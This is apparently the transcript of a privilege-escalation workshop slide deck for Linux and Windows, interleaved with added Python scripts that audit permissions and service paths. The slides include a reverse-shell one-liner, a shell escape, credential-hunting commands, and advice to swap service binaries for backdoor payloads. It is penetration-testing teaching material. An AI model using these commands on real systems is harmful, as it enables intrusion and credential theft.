Privilege escalation from 1 to 0 Workshop
Privilege Escalation From 1 To 0
By : Hossam Mohamed
About ME
• Hossam Mohamed
• Egyptian, 18 years old
• Working as a cyber security analyst @ Boraq-Group
• Working in cyber security for 2 years :)
• PHP, Python lover
• GitHub, Twitter, LinkedIn: @wazehell
What Will Be Covered ?
• Understanding privilege escalation components
• Linux privilege escalation
• Windows privilege escalation
• Some demos
Why Do I Need Privilege Escalation ?
• Why does everyone want to get high ?
• Limited access or a fully compromised machine ?
• Opportunity to maintain access
• More control
Tag : hacktrick_pef10
For Who
Privilege Escalation Types
Horizontal Privilege Escalation : a normal user accesses functions or content belonging to other users
Vertical Privilege Escalation (also known as privilege elevation) : lower privilege user > higher privilege user
Vertical privilege escalation is what we will talk about
Lower privilege user -> Higher privilege user
System Root > Sudo Users > Users - Service Users
Administrators > P Users > Users - Service Users
Windows
• Known exploits
• Vulnerable Windows services
• Misconfigurations
Linux
• Kernel exploits
• Known exploits
• Exploiting services
• Exploiting sudo users
• Misconfigurations
Let's talk a little bit about the kernel
• A kernel is the core component of any operating system
• Low level tasks (disk management, memory management)
• Memory management and I/O
• Link between hardware (I/O), apps, CPU and memory
• Device management through the use of device drivers
The kernel is responsible !
We don't need to know too much about the kernel at this moment
MES
Misconfiguration / Exploit / Vulnerable Service
• Vulnerable machine
• Exploit !
• Ability to move the exploit
• Ability to compile and run
• SUID
• Sudo users
• Weak file permissions
• And many more
• We will talk about that a lot
Start with Linux
• Kernel exploitation
• Weak passwords of high privilege users
• Files with weak permissions
• Configuration and log files
• History
• Env , $PATH
• Shell escape
• Vulnerable app / service
• Weak permissions on jobs/tasks
• Sudoers
• System misconfiguration
Kernel Exploits
• Kernel exploits
• Find a stable one or die()
• MCE (Move - Compile - Execute)
• Problems with kernel exploits
• Dirty Cow :)
Dirty Cow
• October 2016
• Write (W) access to memory mappings
• Inject, or in other words write code into, privileged files
• Flaw in the kernel's memory subsystem which handles copy-on-write
It's Not A Cow
• copy-on-write (COW) !
• Demo
Password Attacks
# Passwords everywhere
Check for users without passwords .. maybe you get more privilege !
Check for credentials
Are you sudo ? Then check /etc/shadow
John the Ripper is here
Password mining (configs, logs, bash_history)
Password policy weakness
Password Attacks
Understanding /etc/passwd
1 => username
2 => password (normally just "x")
3 => UID
4 => GID
5 => user info
6 => home dir
7 => shell
All password hashes are in /etc/shadow
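The seven fields above, turned into a small audit. This is an added example, not from the slides: it parses constructed /etc/passwd lines and flags what the slide hints at, an empty password field, a hash kept in /etc/passwd instead of /etc/shadow, and UID 0 accounts that are not root.

```python
"""Audit /etc/passwd for the weaknesses the slide points at.

Added example, not from the original slides. SAMPLE_PASSWD is constructed
for the demo; point audit_passwd() at a real file on a box you are
authorised to review.
"""
from typing import Dict, List

# Constructed sample: three legitimate accounts and three suspicious ones.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hossam:x:1000:1000:Hossam:/home/hossam:/bin/bash
backup2::1001:1001:old backup user:/home/backup2:/bin/sh
toor:x:0:0:second root:/root:/bin/bash
legacy:$6$salt$hashhashhash:1002:1002::/home/legacy:/bin/bash
"""

# The seven colon-separated fields, in the order the slide lists them.
FIELDS = ("username", "password", "uid", "gid", "gecos", "home", "shell")


def parse_passwd(text: str) -> List[Dict]:
    """Split each non-comment line into the seven fields; UID/GID become ints."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(parts)}")
        entry = dict(zip(FIELDS, parts))
        entry["uid"] = int(entry["uid"])
        entry["gid"] = int(entry["gid"])
        entries.append(entry)
    return entries


def audit_passwd(text: str) -> List[str]:
    """Return one finding per weakness; an empty list means nothing was found."""
    findings = []
    for e in parse_passwd(text):
        name, pw = e["username"], e["password"]
        # Field 2 should be "x" (the hash lives in /etc/shadow). Empty = no password.
        if pw == "":
            findings.append(f"{name}: empty password field (login without a password)")
        # A hash stored here is world-readable, so it can be cracked offline.
        elif pw not in ("x", "*", "!", "!!"):
            findings.append(f"{name}: password hash stored in world-readable /etc/passwd")
        # Any UID 0 account is root, whatever its name.
        if e["uid"] == 0 and name != "root":
            findings.append(f"{name}: UID 0 account other than root")
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(SAMPLE_PASSWD):
        print(finding)
```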
Password Attacks
Logs , History
cat ~/.bash_history | grep --text "ssh"
Or whatever command you can pass the password to via the command line
Maybe web CMS configs !
Admin notes
Keys
And many more !
Escape to shell
Restricted Shell
Restricted shells limit the user's ability and only allow them to perform a subset of system commands
# so how to kill it !
# Development environment (python, perl, ruby, go, php .. etc)
# Redirecting output using redirection operators like >, >>, >|, &>
# Using the 'exec' built-in, like find . -exec /bin/bash \;
# Unsetting certain environment variables
# Specifying filenames or command names that contain slashes.
Cron Jobs .. Time Game :)
# What are cron jobs ?
Cron jobs, if not configured properly, can be exploited to get root privilege.
# Are the scripts or binaries run by cron jobs writable ?
# Is the cron.d directory writable ?
# Can we write over the cron file itself ?
ls -la /etc/cron.d
find /etc/cron* -perm -0002 -type f -exec ls -la {} \; -exec cat {} 2>/dev/null \;
bash -i >& /dev/tcp/127.0.0.1/4444 0>&1
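The three cron checks above in one script. This is an added example, not from the slides: it parses /etc/cron.d style entries and reports world-writable cron files and world-writable job scripts, the same condition the find -perm -0002 command tests; the cron file and scripts are constructed in a temporary directory.

```python
"""Cron job permission audit (find -perm -0002 in Python).

Added example, not from the original slides. build_demo() constructs a
throwaway cron.d file plus two scripts; audit_cron_file() works on any
real /etc/cron.d entry as well.
"""
import os
import stat
import tempfile
from typing import List, Optional, Tuple


def world_writable(path: str) -> bool:
    """True if 'other' has write permission on path (same bit as -perm -0002)."""
    try:
        return bool(os.stat(path).st_mode & stat.S_IWOTH)
    except FileNotFoundError:
        return False


def parse_cron_d_line(line: str) -> Optional[Tuple[str, str]]:
    """Parse an /etc/cron.d style line: 5 schedule fields, user, command.
    Returns (user, command), or None for blanks, comments and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#") or "=" in line.split()[0]:
        return None
    parts = line.split(None, 6)
    if len(parts) < 7:
        return None
    return parts[5], parts[6]


def audit_cron_file(cron_path: str) -> List[str]:
    """Findings for one cron file: writable file, writable scripts, writable dirs."""
    findings = []
    if world_writable(cron_path):
        findings.append(f"{cron_path}: cron file itself is world-writable")
    with open(cron_path) as fh:
        for line in fh:
            parsed = parse_cron_d_line(line)
            if parsed is None:
                continue
            user, command = parsed
            program = command.split()[0]          # first token is what cron executes
            if not program.startswith("/"):
                findings.append(f"{program}: relative path run as {user} (depends on PATH)")
                continue
            if world_writable(program):
                findings.append(f"{program}: world-writable script run as {user}")
            parent = os.path.dirname(program)
            if world_writable(parent):
                findings.append(f"{parent}: world-writable directory holding a {user} cron job")
    return findings


def build_demo() -> str:
    """Construct a cron.d file and two scripts (one mode 0777); returns the cron file path."""
    base = tempfile.mkdtemp(prefix="cron-audit-")
    bin_dir = os.path.join(base, "bin")
    os.mkdir(bin_dir)
    os.chmod(bin_dir, 0o755)                      # directory itself is fine
    safe = os.path.join(bin_dir, "safe.sh")
    loose = os.path.join(bin_dir, "loose.sh")
    for path in (safe, loose):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho hi\n")
    os.chmod(safe, 0o755)
    os.chmod(loose, 0o777)                        # the misconfiguration under test
    cron_path = os.path.join(base, "backup")
    with open(cron_path, "w") as fh:
        fh.write("SHELL=/bin/sh\n# constructed sample\n"
                 f"0 2 * * * root {safe}\n"
                 f"*/5 * * * * root {loose}\n"
                 "0 3 * * * root cleanup.sh\n")
    os.chmod(cron_path, 0o644)
    return cron_path


if __name__ == "__main__":
    for finding in audit_cron_file(build_demo()):
        print(finding)
```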
Sudo
• Super User Pls Do It !
• Run as other users
• cat /etc/sudoers
• What sudoers can do
# File Permissions
• Check files .
• Edit and run :)
• More !
R = read => 4
W = write => 2
X = execute => 1
# SUID Files
Allows you to run a program as another user (its owner) upon execution
Or in other words (with root)
Local exploits or a BoF in a SUID app will make you run as root
SUID Files
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
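An added example (not from the slides) covering both the 4/2/1 permission digits and the 4000 setuid bit behind the find -perm -4000 commands: it converts numeric modes to and from the ls -l style string, flags root-owned setuid and world-writable files, and walks a directory the way the find commands do.

```python
"""Decode the 4/2/1 permission digits and the setuid/setgid/sticky bits that
the SUID find commands look for. Added example, not from the original slides."""
import os
import stat
from typing import List, Tuple


def mode_to_symbolic(mode: int) -> str:
    """Permission part of a mode as ls -l prints it, e.g. 0o4755 -> 'rwsr-xr-x'.
    Only the low 12 bits matter, so a full st_mode value works too."""
    triples = (
        # read, write, exec, special bit, letter with exec, letter without exec
        (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR, stat.S_ISUID, "s", "S"),
        (stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP, stat.S_ISGID, "s", "S"),
        (stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH, stat.S_ISVTX, "t", "T"),
    )
    out = []
    for r, w, x, special, with_x, without_x in triples:
        out.append("r" if mode & r else "-")
        out.append("w" if mode & w else "-")
        if mode & special:
            # Capital letter = special bit set but no execute bit (ls shows the same)
            out.append(with_x if mode & x else without_x)
        else:
            out.append("x" if mode & x else "-")
    return "".join(out)


def symbolic_to_mode(sym: str) -> int:
    """Inverse of mode_to_symbolic: 'rwsr-xr-x' -> 0o4755."""
    if len(sym) != 9:
        raise ValueError("expected 9 permission characters")
    specials = (stat.S_ISUID, stat.S_ISGID, stat.S_ISVTX)
    mode = 0
    for i in range(3):
        shift = 6 - 3 * i                    # user = 6, group = 3, other = 0
        r, w, x = sym[3 * i:3 * i + 3]
        if r == "r":
            mode |= 4 << shift               # the R = 4 digit from the slide
        if w == "w":
            mode |= 2 << shift               # W = 2
        if x in "xst":
            mode |= 1 << shift               # X = 1
        if x in "sStT":
            mode |= specials[i]              # setuid / setgid / sticky
    return mode


def risk_flags(mode: int, owner_uid: int = 0) -> List[str]:
    """What a defender flags: setuid (root-owned is the interesting case),
    setgid, world-writable, and the combination of the two."""
    flags = []
    if mode & stat.S_ISUID:
        flags.append("setuid-root" if owner_uid == 0 else "setuid")
    if mode & stat.S_ISGID:
        flags.append("setgid")
    if mode & stat.S_IWOTH:
        flags.append("world-writable")
    if mode & stat.S_IWOTH and mode & (stat.S_ISUID | stat.S_ISGID):
        flags.append("CRITICAL: writable and setuid/setgid")
    return flags


def find_special(root: str) -> List[Tuple[str, str, List[str]]]:
    """Python version of `find / -perm -4000 -type f`: walk root and report
    regular files with setuid or setgid set as (path, symbolic, flags)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)              # lstat: do not follow symlinks
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                hits.append((path, mode_to_symbolic(st.st_mode),
                             risk_flags(st.st_mode, st.st_uid)))
    return hits


if __name__ == "__main__":
    for path, sym, flags in find_special("/usr/bin"):
        print(sym, path, flags)
```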
Environment Variables
# Dynamic linker
# What's the dynamic linker ?
Dot in PATH !
Misconfigurations
Webserver => configs => credentials
What if we got MySQL credentials ?
Known services exploits
Modern Linux distributions security
ps -ef | grep root
Exercise
Day 2
Windows Access Control
Only on "NTFS" formatted drives
Cacls output
• F (full access), M (modify access), RX (read and execute access)
• R (read-only access), W (write-only access)
#
• (OI): object inherit, (CI): container inherit
• (IO): inherit only, (NP): do not propagate inherit
• (I): permission inherited from parent container
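The cacls/icacls letters above, used for an audit. This is an added example, not from the slides: it parses constructed icacls output for one directory and lists which low-privileged principals (Everyone, BUILTIN\Users, Authenticated Users, ...) hold an allowed write right, the ACL weakness the later file permission and service slides look for.

```python
"""Parse icacls output and flag write rights granted to low-privileged principals.
Added example, not from the original slides; SAMPLE_ICACLS is constructed."""
import re
from typing import Dict, List, Set

# Constructed icacls output for one directory (the first line carries the path).
SAMPLE_PATH = r"C:\Program Files\blabla app"
SAMPLE_ICACLS = r"""C:\Program Files\blabla app BUILTIN\Administrators:(OI)(CI)(F)
                            NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                            BUILTIN\Users:(OI)(CI)(RX)
                            Everyone:(OI)(CI)(M)
                            BUILTIN\Guests:(DENY)(W)
                            NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(RX,W)

Successfully processed 1 files; Failed processing 0 files
"""

# principal:(flag)(flag)(rights) ... one ACE per line
ACE_RE = re.compile(r"^(.+?):((?:\([^)]*\))+)\s*$")
# Simple rights from the slide (F, M, W) plus granular rights that also allow writing.
WRITE_TOKENS = {"F", "M", "W", "WD", "AD", "DC", "WDAC", "WO", "D"}
# Inheritance flags from the slide: (OI)(CI)(IO)(NP)(I)
INHERIT_TOKENS = {"OI", "CI", "IO", "NP", "I"}
LOW_PRIV = {"everyone", "builtin\\users", "builtin\\guests",
            "nt authority\\authenticated users", "nt authority\\interactive"}


def parse_icacls(output: str, path: str) -> List[Dict]:
    """One dict per ACE: principal, inheritance flags, rights set, deny marker."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):                 # first line: "<path> <first ACE>"
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue                              # blank line or the summary line
        principal, groups = m.group(1), m.group(2)
        tokens = re.findall(r"\(([^)]*)\)", groups)
        deny = "DENY" in tokens
        flags = [t for t in tokens if t in INHERIT_TOKENS]
        rights: Set[str] = set()
        for t in tokens:
            if t in INHERIT_TOKENS or t == "DENY":
                continue
            rights.update(t.split(","))           # "(RX,W)" is a comma list of rights
        aces.append({"principal": principal, "flags": flags,
                     "rights": rights, "deny": deny})
    return aces


def weak_write_acls(output: str, path: str) -> List[str]:
    """Low-privileged principals that are ALLOWED (not denied) a write right."""
    weak = []
    for ace in parse_icacls(output, path):
        if ace["deny"] or ace["principal"].lower() not in LOW_PRIV:
            continue
        granted = ace["rights"] & WRITE_TOKENS
        if granted:
            weak.append(f'{ace["principal"]} -> {",".join(sorted(granted))}')
    return weak


if __name__ == "__main__":
    for entry in weak_write_acls(SAMPLE_ICACLS, SAMPLE_PATH):
        print("writable by low-privileged principal:", entry)
```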
Windows integrity levels (IL)
Untrusted < Low < Medium < High < System < Protected/Installer
Check whether your user is a local admin !!
Windows File Permissions
Overwrite is always a big plus
Identify writeable files
Recently created directories
Default permissions
icacls / cacls utility
Accesschk tool
Write, Read & Execute, Read, Full
From Local Admin To Domain Admin
Local box -> IT admin box -> Domain box
Pass the hash
Hashdump
RDP
Add a new domain admin
Have some fun
Stealing NTLM
From the web !!
Automatic Logon Policy (WinHTTP)
https://github.com/blazeinfosec/ssrf-ntlm/
MySQL
LOAD DATA INFILE
qprocess /server:15.15.45.41
Nltest
Outlook CVE-2018-0950
User Account Control (UAC)
• A security feature of Windows .. isn't ! :)
• Not a security boundary
• Prevents unauthorized changes to the operating system (run app ..etc)
• So UAC is an issue for a pen tester !!
UAC Bypass
1. COM handler hijack
2. Memory injection
3. Some registry keys like (FodHelper - Eventvwr)
Credentials
Credentials are everywhere .
Configs - Backups
Admin notes - Plaintext passwords
Encrypted credentials
Cached credentials (ftp - vnc .. etc)
post/windows/gather/credentials/*
grep => findstr
c:\sysprep.inf
c:\sysprep\
c:\sysprep.xml
c:\Unattended.xml
Credentials
Passwords in the registry
PuTTY - SNMP
reg query HKLM /f password /t REG_SZ /s
Credentials
Have Groups.xml !
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
Password on paper !
Users Information
Local administrators check
net localgroup administrators
Domain user listing
Get-ADUser -Filter * -SearchBase "dc=domain,dc=local" | select Name,SID
User listing
net users
Sessions
qwinsta
Missing Patches
Kernel exploits
Discovery of missing patches
wmic qfe get Caption,Description,HotFixID,InstalledOn
Or kill AV
post/windows/gather/enum_patches
Applications Local Exploit
Our friend exploit-db
Maybe it's not about privilege escalation exploits only
RCE with system privilege !!
You may have other ways !
post/multi/recon/local_exploit_suggester
Services exploitation
As we see, Windows privilege escalation exploitation techniques will start from here ☺
Quick look at exploit-db
More than 60% of Windows privilege escalation exploitation is about services!
It sounds like "ohh I think that's easy"
Good to have PowerShell knowledge
Let's get involved!!
Services exploitation
Identify running services.
net config / services under your control
Say hello to your new friend "sc"
What's sc ?
sc query / lists all of the services on the machine
post/windows/gather/enum_services
Services exploitation
Let's start analysing what we got !
Local administrator or service account !
Local System - Network Service - Local Service
Do you really want to get another limited shell ?
Just get the hashes and go home to crack them, then come back
Get-ADDefaultDomainPasswordPolicy / I think you will know how much time it will take to crack them !!
Services exploitation
Normal service exploitation, some checks
Are the services starting automatically ?
Are the services controllable ?
Can you overwrite the service binary ?
Congratulations, you own the box
Note : "in a modern OS sometimes, when you replace the service binary with a Metasploit payload you will lose the shell after 1 min; that's because the app crashes, so make sure that your payload does a simple task" like installing a backdoor or adding a user
Services exploitation
Want some CVEs in your CV ? I will tell you a trick :")
"Unquoted service paths" or trusted paths
What's that ?
It's about the space and the "
C:\Program Files\blabla app\start.exe
C:\Program*Files\blabla*app\start.exe
All of the * are vulnerable points
If plan A failed, there are another 25 letters of the alphabet to try with it :")
Services exploitation
Identify unquoted services
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows" | findstr /i /v """
Identify the service account level !!
Check write access !
icacls <service path>
Check control
net config | findstr <service name>
Or if it starts automatically, check if you can restart the box
exploit/windows/local/trusted_service_path
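An added example (not from the slides) that performs the unquoted-path check above on `wmic service get name,pathname,startmode /format:csv` output (the /format:csv switch is a real wmic option; the rows below are constructed) and, for each auto-start service, lists the "*" points from the previous slide together with the parent directories whose ACLs must be verified with icacls.

```python
"""Unquoted service path audit from wmic CSV output. Added example, not from the
original slides; SAMPLE_WMIC_CSV is constructed, not captured from a real host."""
import csv
import io
import ntpath
import re
from typing import Dict, List

# Constructed sample. Real `wmic ... /format:csv` output starts with a blank line
# and a Node column, which is why the header is shaped like this.
SAMPLE_WMIC_CSV = r'''
Node,Name,PathName,StartMode
HOST1,Spooler,C:\Windows\System32\spoolsv.exe,Auto
HOST1,BlaSvc,C:\Program Files\blabla app\start.exe -service,Auto
HOST1,GoodSvc,"""C:\Program Files\good app\svc.exe"" --run",Auto
HOST1,ManSvc,C:\Program Files\manual thing\m.exe,Manual
'''

EXE_RE = re.compile(r"^(.*?\.exe)", re.IGNORECASE)


def exe_path(pathname: str) -> str:
    """Executable part of a service command line: everything up to the first '.exe'."""
    m = EXE_RE.match(pathname.strip())
    return m.group(1) if m else pathname.strip().split(" ")[0]


def is_unquoted_vulnerable(pathname: str) -> bool:
    r"""Same filter as the slide's findstr chain: not quoted, contains a space,
    and not under C:\Windows."""
    p = pathname.strip()
    if p.startswith('"'):
        return False
    exe = exe_path(p)
    if " " not in exe:
        return False
    return not exe.lower().startswith("c:\\windows")


def hijack_points(exe: str) -> List[str]:
    r"""The '*' positions on the slide: for every space in the path, the name
    Windows would try before the real one, e.g. C:\Program.exe."""
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def dirs_to_check(exe: str) -> List[str]:
    """Parent directories of the hijack points: these are the ACLs to verify
    (only a writable one makes the service exploitable)."""
    seen: List[str] = []
    for point in hijack_points(exe):
        d = ntpath.dirname(point)
        if d not in seen:
            seen.append(d)
    return seen


def audit_services(wmic_csv: str) -> Dict[str, Dict[str, List[str]]]:
    """Vulnerable auto-start service name -> {'points': [...], 'check_dirs': [...]}."""
    result: Dict[str, Dict[str, List[str]]] = {}
    for row in csv.DictReader(io.StringIO(wmic_csv.strip())):
        if row["StartMode"].strip().lower() != "auto":
            continue                                  # only auto-start services matter
        if not is_unquoted_vulnerable(row["PathName"]):
            continue
        exe = exe_path(row["PathName"])
        result[row["Name"]] = {"points": hijack_points(exe),
                               "check_dirs": dirs_to_check(exe)}
    return result


if __name__ == "__main__":
    for name, info in audit_services(SAMPLE_WMIC_CSV).items():
        print(name, "points:", info["points"], "verify ACLs on:", info["check_dirs"])
```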
Services exploitation
Registry permissions
It's not common ("only Administrators have write permission by default")
But ! It's easy to exploit
Services listing in regedit:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
Take a look and check if you can change the path !
Good luck!
If you are on a Windows box, GUI access is just an option. It depends on you !
Named pipes exploitation
What are pipes ?!
IO Ninja
PipeList
Check your pipes
Metasploit : getsystem
Fuzzing demo
DLL Injection
Windows can dynamically load DLLs
What if a DLL is missing ?
LoadLibrary("iamalib.dll")
LoadLibrary("c:\program files\iamalib.dll")
Not found ?
Windows attempts to locate the DLL by searching a well-defined set of directories
"DLL preloading attack or a binary planting attack"
How does the search work ?
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs
More Exploits
CVE-2018-1038 Total Meltdown
Windows 7 & 2008 R2
Some kernel exploits for Windows 10
https://blog.xpnsec.com/total-meltdown-cve-2018-1038/
Also there is a good book on kernel exploitation:
"A Guide to Kernel Exploitation: Attacking the Core"
AutoRun
AutoRuns tool
Check paths
Can you overwrite ?
Restart
Got SYSTEM account :")
Binary Replacements
Check imported binaries
C:\Windows\System32\sethc.exe
Registry checks
• RunAs
• RunOnce
• RenameOnReboot
• AlwaysInstallElevated
• SRP policy enumeration
Other Checks
• Virtual image backups / storage
VMDK - VHD / VHDX - OVA - ISO - IMG
• Source code of running applications
• Default passwords for installed applications
• Default configuration file locations
What's stored on network shares ?
Task manager
I think this is the end :")
Nice to meet you all !!
@wazehell
More Related Content

What's hot

Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
Rand W. Hirt
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
Software Guru
 

What's hot (20)

How fun of privilege escalation Red Pill2017
How fun of privilege escalation  Red Pill2017How fun of privilege escalation  Red Pill2017
How fun of privilege escalation Red Pill2017
 
Derbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active DirectoryDerbycon - The Unintended Risks of Trusting Active Directory
Derbycon - The Unintended Risks of Trusting Active Directory
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
Security testing
Security testingSecurity testing
Security testing
 
Penetration testing reporting and methodology
Penetration testing reporting and methodologyPenetration testing reporting and methodology
Penetration testing reporting and methodology
 
Pen Testing Explained
Pen Testing ExplainedPen Testing Explained
Pen Testing Explained
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
OWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application VulnerabilitiesOWASP Top 10 Web Application Vulnerabilities
OWASP Top 10 Web Application Vulnerabilities
 
How to Test for The OWASP Top Ten
 How to Test for The OWASP Top Ten How to Test for The OWASP Top Ten
How to Test for The OWASP Top Ten
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Reconnaissance
ReconnaissanceReconnaissance
Reconnaissance
 
Nessus-Vulnerability Tester
Nessus-Vulnerability TesterNessus-Vulnerability Tester
Nessus-Vulnerability Tester
 
Pentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang BhatnagarPentesting Rest API's by :- Gaurang Bhatnagar
Pentesting Rest API's by :- Gaurang Bhatnagar
 
Introduction to Malware Analysis
Introduction to Malware AnalysisIntroduction to Malware Analysis
Introduction to Malware Analysis
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Reverse proxies & Inconsistency
Reverse proxies & InconsistencyReverse proxies & Inconsistency
Reverse proxies & Inconsistency
 
Vulnerability assessment and penetration testing
Vulnerability assessment and penetration testingVulnerability assessment and penetration testing
Vulnerability assessment and penetration testing
 
Vulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration TestingVulnerability and Assessment Penetration Testing
Vulnerability and Assessment Penetration Testing
 
OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)OWASP Top 10 2021 Presentation (Jul 2022)
OWASP Top 10 2021 Presentation (Jul 2022)
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 

Similar to Privilege escalation from 1 to 0 Workshop

BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat Security Conference
 
Utilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan FusilierUtilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan Fusilier
Matthew Turland
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
fangjiafu
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
fangjiafu
 
Mayhem malware
Mayhem malwareMayhem malware
Mayhem malware
Akash Deep
 

Similar to Privilege escalation from 1 to 0 Workshop (20)

Linux privesc.pptx
Linux privesc.pptxLinux privesc.pptx
Linux privesc.pptx
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Utilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan FusilierUtilizing the Xen Hypervisor in business practice - Bryan Fusilier
Utilizing the Xen Hypervisor in business practice - Bryan Fusilier
 
The Complete CTF Road Map
The Complete CTF Road Map The Complete CTF Road Map
The Complete CTF Road Map
 
Windows Privilege Escalation
Windows Privilege EscalationWindows Privilege Escalation
Windows Privilege Escalation
 
unit 2 confinement techniques.pdf
unit 2 confinement techniques.pdfunit 2 confinement techniques.pdf
unit 2 confinement techniques.pdf
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
 
Windows Malware Techniques
Windows Malware TechniquesWindows Malware Techniques
Windows Malware Techniques
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Gwc3
Gwc3Gwc3
Gwc3
 
Check Your Privilege (Escalation)
Check Your Privilege (Escalation) Check Your Privilege (Escalation)
Check Your Privilege (Escalation)
 
Understanding salt modular sub-systems and customization
Understanding salt   modular sub-systems and customizationUnderstanding salt   modular sub-systems and customization
Understanding salt modular sub-systems and customization
 
Mayhem malware
Mayhem malwareMayhem malware
Mayhem malware
 
Anton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is HackedAnton Chuvakin on Discovering That Your Linux Box is Hacked
Anton Chuvakin on Discovering That Your Linux Box is Hacked
 
How to build an admin guy
How to build an admin guyHow to build an admin guy
How to build an admin guy
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
 
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsIntroduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation Methods
 
Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015Your Inner Sysadmin - MidwestPHP 2015
Your Inner Sysadmin - MidwestPHP 2015
 

Recently uploaded

Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...Hyatt driving innovation and exceptional customer experiences with FIDO passw...
Hyatt driving innovation and exceptional customer experiences with FIDO passw...
FIDO Alliance
 
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptxHarnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
Harnessing Passkeys in the Battle Against AI-Powered Cyber Threats.pptx
FIDO Alliance
 
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc Webinar - Unified Trust Center for Privacy, Security, Compliance, an...
TrustArc
 

Recently uploaded (20)

WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024WebRTC and SIP not just audio and video @ OpenSIPS 2024
WebRTC and SIP not just audio and video @ OpenSIPS 2024
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Navigating Identity and Access Management in the Modern Enterprise
Navigating Identity and Access Management in the Modern EnterpriseNavigating Identity and Access Management in the Modern Enterprise
Navigating Identity and Access Management in the Modern Enterprise
 
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal OntologySix Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
 
